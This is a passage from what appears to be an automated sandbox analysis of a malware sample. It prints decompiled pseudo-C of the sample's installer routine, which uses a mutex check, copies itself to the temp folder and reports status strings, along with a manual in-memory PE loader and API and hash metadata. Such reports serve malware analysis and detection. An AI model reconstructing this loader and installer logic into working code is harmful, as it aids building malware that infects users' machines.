                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                  • API String ID: 2977319401-1799206989
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0043238A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                                  • API String ID: 190572456-850864035
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E10020600(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v311;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v575;
                                                                                                                                                                  				char _v576;
                                                                                                                                                                  				long _v580;
                                                                                                                                                                  				intOrPtr _v584;
                                                                                                                                                                  				intOrPtr _v588;
                                                                                                                                                                  				intOrPtr _v592;
                                                                                                                                                                  				intOrPtr _v596;
                                                                                                                                                                  				intOrPtr _v600;
                                                                                                                                                                  				intOrPtr _v604;
                                                                                                                                                                  				intOrPtr _v608;
                                                                                                                                                                  				intOrPtr _v612;
                                                                                                                                                                  				intOrPtr _v616;
                                                                                                                                                                  				intOrPtr _v620;
                                                                                                                                                                  				intOrPtr _v624;
                                                                                                                                                                  				intOrPtr _v628;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				int _t47;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                                  				int _t75;
                                                                                                                                                                  				int _t77;
                                                                                                                                                                  				void* _t101;
                                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                                  				void* _t108;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				void* _t111;
                                                                                                                                                                  				intOrPtr _t114;
                                                                                                                                                                  				void* _t115;
                                                                                                                                                                  				intOrPtr _t116;
                                                                                                                                                                  				intOrPtr _t118;
                                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                                  				void* _t125;
                                                                                                                                                                  
                                                                                                                                                                  				_t125 = __eflags;
                                                                                                                                                                  				_t100 = __edi;
                                                                                                                                                                  				_t82 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100233D5);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t104;
                                                                                                                                                                  				_push(_t101);
                                                                                                                                                                  				E1001FDA0();
                                                                                                                                                                  				_v312 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v311, 0, 0x103);
                                                                                                                                                                  				GetModuleFileNameA(0,  &_v312, 0x104);
                                                                                                                                                                  				E1001A660(__ebx, _t100, _t101, _t125,  &_v44); // executed
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t46 = E10001A50( &_v312, E100011E0( &_v44));
                                                                                                                                                                  				_t108 = _t104 - 0x264 + 0x18;
                                                                                                                                                                  				_t126 = _t46;
                                                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                                                  					_t47 = E1001A150("Global\\exist_sign__install_r3");
                                                                                                                                                                  					_t109 = _t108 + 4;
                                                                                                                                                                  					__eflags = _t47;
                                                                                                                                                                  					if(_t47 == 0) {
                                                                                                                                                                  						_v576 = 0;
                                                                                                                                                                  						E1000CF80(_t100,  &_v575, 0, 0x103);
                                                                                                                                                                  						GetTempPathA(0x104,  &_v576);
                                                                                                                                                                  						E1000CDB3( &_v576,  &_v576, 0x104, E100011E0( &_v44));
                                                                                                                                                                  						_t111 = _t109 + 0x18;
                                                                                                                                                                  						CopyFileA( &_v312,  &_v576, 0);
                                                                                                                                                                  						_v580 = GetTickCount();
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t56 = E1001A1D0( &_v312);
                                                                                                                                                                  							_t102 = _t56;
                                                                                                                                                                  							_t57 = E1001A1D0( &_v576);
                                                                                                                                                                  							_t111 = _t111 + 8;
                                                                                                                                                                  							__eflags = _t56 - _t57;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							Sleep(0x3e8);
                                                                                                                                                                  							__eflags = GetTickCount() - _v580 - 0x7530;
                                                                                                                                                                  							if(__eflags <= 0) {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  							}
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						E1001FE40();
                                                                                                                                                                  						E10020020(_t82, _t100, _t102, __eflags, "install", "user01", "-0.1", "51.0", "exe");
                                                                                                                                                                  						_t114 = _t111 + 0x14 - 0x1c;
                                                                                                                                                                  						_t89 = _t114;
                                                                                                                                                                  						_v588 = _t114;
                                                                                                                                                                  						_v612 = E10001160(_t114, __eflags, "status=main_start");
                                                                                                                                                                  						E100202C0(_t82, _t100, _t102, __eflags);
                                                                                                                                                                  						_t115 = _t114 + 0x1c;
                                                                                                                                                                  						__eflags = PathFileExistsA("C:\\hijack");
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							L15:
                                                                                                                                                                  							_t116 = _t115 - 0x1c;
                                                                                                                                                                  							_v592 = _t116;
                                                                                                                                                                  							_v616 = E10001160(_t116, __eflags, "status=check_debug");
                                                                                                                                                                  							E100202C0(_t82, _t100, _t102, __eflags);
                                                                                                                                                                  							_t118 = _t116 + 0x1c - 0x1c;
                                                                                                                                                                  							_v596 = _t118;
                                                                                                                                                                  							_v620 = E10001160(_t118, __eflags, "user01");
                                                                                                                                                                  							E1001FF30(_t82, _t100, _t102, __eflags);
                                                                                                                                                                  							_t120 = _t118 + 0x1c - 0x1c;
                                                                                                                                                                  							_v600 = _t120;
                                                                                                                                                                  							_v624 = E10001160(_t120, __eflags, "user01");
                                                                                                                                                                  							E1001FE50(_t82, _t100, _t102, __eflags);
                                                                                                                                                                  							_v604 = _t120 + 0x1c - 0x1c;
                                                                                                                                                                  							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                                                                                                                                                                  							E100202C0(_t82, _t100, _t102, __eflags);
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E1001A100();
                                                                                                                                                                  							_t75 = E1001A110(_t89);
                                                                                                                                                                  							__eflags = _t75;
                                                                                                                                                                  							if(_t75 == 0) {
                                                                                                                                                                  								L12:
                                                                                                                                                                  							} else {
                                                                                                                                                                  								__eflags = E10019D70();
                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                  									_t77 = E1001FA90(_t82, _t100, _t102, __eflags, 0x3e8, 0);
                                                                                                                                                                  									_t115 = _t115 + 8;
                                                                                                                                                                  									__eflags = _t77;
                                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                                  										goto L15;
                                                                                                                                                                  									} else {
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  					}
                                                                                                                                                                  					E1001A2C0();
                                                                                                                                                                  					_v608 = 1;
                                                                                                                                                                  					_v8 = 0xffffffff;
                                                                                                                                                                  					E100011A0( &_v44);
                                                                                                                                                                  					_t73 = _v608;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E10020BC0(__ebx, _t100, _t101, _t126, "51.0"); // executed
                                                                                                                                                                  					_v584 = 1;
                                                                                                                                                                  					_v8 = 0xffffffff;
                                                                                                                                                                  					E100011A0( &_v44);
                                                                                                                                                                  					_t73 = _v584;
                                                                                                                                                                  				}
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _t73;
                                                                                                                                                                  			}











































                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 10020639
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002064F
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                  • String ID: -0.1$51.0$51.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                                  • API String ID: 3079340674-877224509
                                                                                                                                                                  • Opcode ID: 08ff04adda192b7303e2b5c42e65d93590a46696a8f5dba613417a9f261e5fd2
                                                                                                                                                                  • Instruction ID: 4ca8eb26ed237a7cbfddb670d92fde38fcb821bcdd61c2f7abf1832b517c0666
                                                                                                                                                                  • Opcode Fuzzy Hash: 08ff04adda192b7303e2b5c42e65d93590a46696a8f5dba613417a9f261e5fd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51C2B9D003089BEB10FBA4DC4ABDD7675EB10344F4401A5FA0966183EF71BB84CBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A1D0(CHAR* _a4) {
                                                                                                                                                                  				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                                                  				intOrPtr _v328;
                                                                                                                                                                  				void* _v332;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  
                                                                                                                                                                  				_v328 = 0;
                                                                                                                                                                  				_t11 = FindFirstFileA(_a4,  &_v324); // executed
                                                                                                                                                                  				_v332 = _t11;
                                                                                                                                                                  				if(_v332 != 0xffffffff) {
                                                                                                                                                                  					_v328 = _v324.nFileSizeLow;
                                                                                                                                                                  				}
                                                                                                                                                                  				FindClose(_v332); // executed
                                                                                                                                                                  				return _v328;
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNEL32(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 1001A216
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
                                                                                                                                                                  • Instruction ID: d31bde6dcc0951e355ad99ae7a1c5ee3f3ec40d99bb51e99ff820f39f399f313
                                                                                                                                                                  • Opcode Fuzzy Hash: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0A57590022C9BDB70DF64DD88BDDB7B8AB08310F1002D4E91DA32A0DB30AAD58F51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1001B680(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				signed short* _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				_Unknown_base(*)()* _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				signed int _v36;
                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				void* _v76;
                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                  				intOrPtr* _v84;
                                                                                                                                                                  				intOrPtr _v88;
                                                                                                                                                                  				intOrPtr _v92;
                                                                                                                                                                  				intOrPtr _v96;
                                                                                                                                                                  				intOrPtr _v100;
                                                                                                                                                                  				void* _t170;
                                                                                                                                                                  				void* _t173;
                                                                                                                                                                  				void* _t182;
                                                                                                                                                                  				intOrPtr _t184;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  				void* _t206;
                                                                                                                                                                  				void* _t207;
                                                                                                                                                                  				void* _t209;
                                                                                                                                                                  				intOrPtr _t220;
                                                                                                                                                                  				intOrPtr _t225;
                                                                                                                                                                  				void* _t239;
                                                                                                                                                                  				intOrPtr _t311;
                                                                                                                                                                  				void* _t326;
                                                                                                                                                                  				void* _t327;
                                                                                                                                                                  				void* _t328;
                                                                                                                                                                  				void* _t329;
                                                                                                                                                                  				void* _t330;
                                                                                                                                                                  				void* _t332;
                                                                                                                                                                  				void* _t333;
                                                                                                                                                                  				void* _t334;
                                                                                                                                                                  				void* _t337;
                                                                                                                                                                  				void* _t338;
                                                                                                                                                                  				void* _t339;
                                                                                                                                                                  
                                                                                                                                                                  				_t327 = __esi;
                                                                                                                                                                  				_t326 = __edi;
                                                                                                                                                                  				_t239 = __ebx;
                                                                                                                                                                  				_v76 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                                                                                                  				_t170 = E1001AEA0(_a8, 0x40);
                                                                                                                                                                  				_t329 = _t328 + 8;
                                                                                                                                                                  				if(_t170 != 0) {
                                                                                                                                                                  					_v16 = _a4;
                                                                                                                                                                  					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                                  						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                  						_t173 = E1001AEA0(_a8,  *_t9 + 0xf8);
                                                                                                                                                                  						_t330 = _t329 + 8;
                                                                                                                                                                  						if(_t173 != 0) {
                                                                                                                                                                  							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                  							_v84 = _a4 +  *_t13;
                                                                                                                                                                  							if( *_v84 == 0x4550) {
                                                                                                                                                                  								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                                  									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                                  										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                  										_v36 =  *(_v84 + 0x38);
                                                                                                                                                                  										_v12 = 0;
                                                                                                                                                                  										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
                                                                                                                                                                  											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
                                                                                                                                                                  												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
                                                                                                                                                                  											}
                                                                                                                                                                  											if(_v92 > _v20) {
                                                                                                                                                                  												_v20 = _v92;
                                                                                                                                                                  											}
                                                                                                                                                                  											_v12 = _v12 + 1;
                                                                                                                                                                  											_v88 = _v88 + 0x28;
                                                                                                                                                                  										}
                                                                                                                                                                  										_v28( &_v72);
                                                                                                                                                                  										_v32 = E1001AEE0( *((intOrPtr*)(_v84 + 0x50)), _v68);
                                                                                                                                                                  										_t182 = E1001AEE0(_v20, _v68);
                                                                                                                                                                  										_t332 = _t330 + 0x10;
                                                                                                                                                                  										if(_v32 == _t182) {
                                                                                                                                                                  											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
                                                                                                                                                                  											_t333 = _t332 + 0x14;
                                                                                                                                                                  											_v24 = _t184;
                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                  												L26:
                                                                                                                                                                  												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                                                                                  												if(_v76 != 0) {
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 4)) = _v24;
                                                                                                                                                                  													asm("sbb ecx, ecx");
                                                                                                                                                                  													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
                                                                                                                                                                  													_t194 = E1001AEA0(_a8,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                                  													_t334 = _t333 + 8;
                                                                                                                                                                  													if(_t194 != 0) {
                                                                                                                                                                  														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
                                                                                                                                                                  														E1000D1F0(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                                  														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                  														 *_v76 = _v8 +  *_t121;
                                                                                                                                                                  														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
                                                                                                                                                                  														_t203 = E1001B360(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
                                                                                                                                                                  														_t337 = _t334 + 0x30;
                                                                                                                                                                  														if(_t203 != 0) {
                                                                                                                                                                  															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
                                                                                                                                                                  															_v80 = _t311;
                                                                                                                                                                  															if(_t311 == 0) {
                                                                                                                                                                  																 *((intOrPtr*)(_v76 + 0x18)) = 1;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t220 = E1001B120(_v76, _v80);
                                                                                                                                                                  																_t337 = _t337 + 8;
                                                                                                                                                                  																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t206 = E1001ABC0(_v76); // executed
                                                                                                                                                                  															_t338 = _t337 + 4;
                                                                                                                                                                  															if(_t206 != 0) {
                                                                                                                                                                  																_t207 = E1001B4F0(_v76); // executed
                                                                                                                                                                  																_t339 = _t338 + 4;
                                                                                                                                                                  																if(_t207 != 0) {
                                                                                                                                                                  																	_t209 = E1001ADE0(_v76);
                                                                                                                                                                  																	_t339 = _t339 + 4;
                                                                                                                                                                  																	if(_t209 != 0) {
                                                                                                                                                                  																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
                                                                                                                                                                  																			L49:
                                                                                                                                                                  																			return _v76;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		if( *(_v76 + 0x14) == 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                                  																			L47:
                                                                                                                                                                  																			goto L49;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                                  																		_v96 = _v100(_v24, 1, 0);
                                                                                                                                                                  																		if(_v96 != 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
                                                                                                                                                                  																			goto L47;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		SetLastError(0x45a);
                                                                                                                                                                  																		L50:
                                                                                                                                                                  																		E1001A9C0(_v76);
                                                                                                                                                                  																		return 0;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L50;
                                                                                                                                                                  																}
                                                                                                                                                                  																goto L50;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L50;
                                                                                                                                                                  														}
                                                                                                                                                                  														goto L50;
                                                                                                                                                                  													}
                                                                                                                                                                  													goto L50;
                                                                                                                                                                  												}
                                                                                                                                                                  												_a16(_v24, 0, 0x8000, _a32);
                                                                                                                                                                  												SetLastError(0xe);
                                                                                                                                                                  												return 0;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
                                                                                                                                                                  											_t333 = _t333 + 0x14;
                                                                                                                                                                  											_v24 = _t225;
                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                  												goto L26;
                                                                                                                                                                  											}
                                                                                                                                                                  											SetLastError(0xe);
                                                                                                                                                                  											return 0;
                                                                                                                                                                  										}
                                                                                                                                                                  										SetLastError(0xc1);
                                                                                                                                                                  										return 0;
                                                                                                                                                                  									}
                                                                                                                                                                  									SetLastError(0xc1);
                                                                                                                                                                  									return 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								SetLastError(0xc1);
                                                                                                                                                                  								return 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							SetLastError(0xc1);
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					SetLastError(0xc1);
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}













































                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B69E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001B6A5
                                                                                                                                                                    • Part of subcall function 1001AEA0: SetLastError.KERNEL32(0000000D,?,1001B6B9,10020924,00000040), ref: 1001AEAD
                                                                                                                                                                  • SetLastError.KERNEL32(000000C1), ref: 1001B6DF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                  • API String ID: 1762409328-192647395
                                                                                                                                                                  • Opcode ID: 3eee6498037c2fe8ffe83811f43bb82ec4f96475871352c36a7dddd69a664305
                                                                                                                                                                  • Instruction ID: 694ab680ebfe8ef0636185c130ad71dc1cebcbc5687b108a2a2fd76037c7b5c4
                                                                                                                                                                  • Opcode Fuzzy Hash: 3eee6498037c2fe8ffe83811f43bb82ec4f96475871352c36a7dddd69a664305
                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE1F874A00609DFDB04CFA4C884AAEBBB1FF88305F648558E905AF385D774E982CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E1000E96E() {
                                                                                                                                                                  				int _t13;
                                                                                                                                                                  				long _t19;
                                                                                                                                                                  				signed int _t20;
                                                                                                                                                                  				signed int _t21;
                                                                                                                                                                  				signed int _t22;
                                                                                                                                                                  				signed int _t23;
                                                                                                                                                                  				signed int _t27;
                                                                                                                                                                  				signed int _t28;
                                                                                                                                                                  				signed int _t32;
                                                                                                                                                                  				signed int _t33;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				long _t39;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				signed int _t47;
                                                                                                                                                                  				struct _OSVERSIONINFOA* _t49;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  
                                                                                                                                                                  				_t37 = GetProcessHeap;
                                                                                                                                                                  				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
                                                                                                                                                                  				if(_t49 != 0) {
                                                                                                                                                                  					_t49->dwOSVersionInfoSize = 0x94;
                                                                                                                                                                  					_t13 = GetVersionExA(_t49);
                                                                                                                                                                  					__eflags = _t13;
                                                                                                                                                                  					_push(_t49);
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					if(_t13 != 0) {
                                                                                                                                                                  						 *(_t51 + 0xc) = _t49->dwPlatformId;
                                                                                                                                                                  						 *(_t51 + 0x10) = _t49->dwMajorVersion;
                                                                                                                                                                  						 *(_t51 - 4) = _t49->dwMinorVersion;
                                                                                                                                                                  						_t47 = _t49->dwBuildNumber & 0x00007fff;
                                                                                                                                                                  						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                  						_t19 =  *(_t51 + 0xc);
                                                                                                                                                                  						__eflags = _t19 - 2;
                                                                                                                                                                  						if(_t19 != 2) {
                                                                                                                                                                  							_t47 = _t47 | 0x00008000;
                                                                                                                                                                  							__eflags = _t47;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t39 =  *(_t51 - 4);
                                                                                                                                                                  						 *0x1033548c = _t19;
                                                                                                                                                                  						_t20 =  *(_t51 + 0x10);
                                                                                                                                                                  						_t44 = (_t20 << 8) + _t39;
                                                                                                                                                                  						 *0x10335494 = (_t20 << 8) + _t39;
                                                                                                                                                                  						 *0x10335498 = _t20;
                                                                                                                                                                  						 *0x1033549c = _t39;
                                                                                                                                                                  						 *0x10335490 = _t47;
                                                                                                                                                                  						_t21 = E1000F81F(1);
                                                                                                                                                                  						__eflags = _t21;
                                                                                                                                                                  						_pop(_t40);
                                                                                                                                                                  						if(_t21 == 0) {
                                                                                                                                                                  							goto L1;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t23 = E10011936(_t37);
                                                                                                                                                                  							__eflags = _t23;
                                                                                                                                                                  							if(_t23 != 0) {
                                                                                                                                                                  								E100150E1();
                                                                                                                                                                  								 *0x10338f64 = GetCommandLineA();
                                                                                                                                                                  								 *0x103352fc = E10014FAC(); // executed
                                                                                                                                                                  								_t27 = E100149F4(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                                  								__eflags = _t27;
                                                                                                                                                                  								if(_t27 >= 0) {
                                                                                                                                                                  									_t28 = E10014EF3(_t40);
                                                                                                                                                                  									__eflags = _t28;
                                                                                                                                                                  									if(_t28 < 0) {
                                                                                                                                                                  										L15:
                                                                                                                                                                  										E10014C34();
                                                                                                                                                                  										goto L10;
